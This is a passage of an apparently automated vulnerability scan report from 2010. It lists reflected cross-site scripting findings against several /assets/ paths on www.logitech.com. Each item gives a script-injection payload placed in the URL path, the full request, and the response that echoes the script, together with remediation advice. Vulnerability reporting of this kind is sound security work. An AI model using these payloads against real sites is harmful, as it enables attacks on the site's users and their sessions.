Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="de98c"><script>alert(1)</script>72a8646bc33/2062">
...[SNIP]...

1.34. http://www.logitech.com/assets/2062/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/2062/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a874e</script><script>alert(1)</script>62f02bb3036 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a874e</script><script>alert(1)</script>62f02bb3036/2062/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','a874e</script><script>alert(1)</script>62f02bb3036/2062' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.d
...[SNIP]...

1.35. http://www.logitech.com/assets/20916/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/20916/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73cab"><script>alert(1)</script>30f517d160a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /73cab"><script>alert(1)</script>30f517d160a/20916/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="73cab"><script>alert(1)</script>30f517d160a/20916">
...[SNIP]...

1.36. http://www.logitech.com/assets/20916/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/20916/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a30c9</script><script>alert(1)</script>c31ef0f56d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a30c9</script><script>alert(1)</script>c31ef0f56d9/20916/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','a30c9</script><script>alert(1)</script>c31ef0f56d9/20916' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.37. http://www.logitech.com/assets/20917/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/20917/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b282d"><script>alert(1)</script>83dbf66b326 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /b282d"><script>alert(1)</script>83dbf66b326/20917/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="b282d"><script>alert(1)</script>83dbf66b326/20917">
...[SNIP]...

1.38. http://www.logitech.com/assets/20917/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/20917/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42995</script><script>alert(1)</script>cad82b14edf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /42995</script><script>alert(1)</script>cad82b14edf/20917/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','42995</script><script>alert(1)</script>cad82b14edf/20917' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.39. http://www.logitech.com/assets/20918/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/20918/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff247</script><script>alert(1)</script>b5bb4302480 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ff247</script><script>alert(1)</script>b5bb4302480/20918/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','ff247</script><script>alert(1)</script>b5bb4302480/20918' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.40. http://www.logitech.com/assets/20918/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/20918/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbd91"><script>alert(1)</script>ba13ba050da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /dbd91"><script>alert(1)</script>ba13ba050da/20918/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="dbd91"><script>alert(1)</script>ba13ba050da/20918">
...[SNIP]...

1.41. http://www.logitech.com/assets/20920/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/20920/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a2a4"><script>alert(1)</script>22fabc67789 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /2a2a4"><script>alert(1)</script>22fabc67789/20920/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="2a2a4"><script>alert(1)</script>22fabc67789/20920">
...[SNIP]...

1.42. http://www.logitech.com/assets/20920/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/20920/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89db0</script><script>alert(1)</script>56314fd7a9b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /89db0</script><script>alert(1)</script>56314fd7a9b/20920/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','89db0</script><script>alert(1)</script>56314fd7a9b/20920' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.43. http://www.logitech.com/assets/20921/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/20921/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fdd3"><script>alert(1)</script>d3629de7407 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /1fdd3"><script>alert(1)</script>d3629de7407/20921/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="1fdd3"><script>alert(1)</script>d3629de7407/20921">
...[SNIP]...

1.44. http://www.logitech.com/assets/20921/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/20921/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b9d0</script><script>alert(1)</script>b4c12caa80a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /8b9d0</script><script>alert(1)</script>b4c12caa80a/20921/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','8b9d0</script><script>alert(1)</script>b4c12caa80a/20921' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.45. http://www.logitech.com/assets/22511/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/22511/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47b65"><script>alert(1)</script>31ffe28bf6d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /47b65"><script>alert(1)</script>31ffe28bf6d/22511/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="47b65"><script>alert(1)</script>31ffe28bf6d/22511">
...[SNIP]...

1.46. http://www.logitech.com/assets/22511/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/22511/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc283</script><script>alert(1)</script>3f96130449 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fc283</script><script>alert(1)</script>3f96130449/22511/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','fc283</script><script>alert(1)</script>3f96130449/22511' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.47. http://www.logitech.com/assets/26006/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/26006/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 485c2"><script>alert(1)</script>b1c196248bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /485c2"><script>alert(1)</script>b1c196248bf/26006/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="485c2"><script>alert(1)</script>b1c196248bf/26006">
...[SNIP]...

1.48. http://www.logitech.com/assets/26006/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/26006/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cec7a</script><script>alert(1)</script>4cd69b32f14 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cec7a</script><script>alert(1)</script>4cd69b32f14/26006/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','cec7a</script><script>alert(1)</script>4cd69b32f14/26006' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.49. http://www.logitech.com/assets/30594/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/30594/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bce8"><script>alert(1)</script>8c620fbcf6a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /2bce8"><script>alert(1)</script>8c620fbcf6a/30594/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="2bce8"><script>alert(1)</script>8c620fbcf6a/30594">
...[SNIP]...

1.50. http://www.logitech.com/assets/30594/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/30594/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4dba</script><script>alert(1)</script>a625bc8e1b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /f4dba</script><script>alert(1)</script>a625bc8e1b2/30594/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','f4dba</script><script>alert(1)</script>a625bc8e1b2/30594' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.51. http://www.logitech.com/assets/30737/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/30737/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8cf7b</script><script>alert(1)</script>5f3bd9197d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

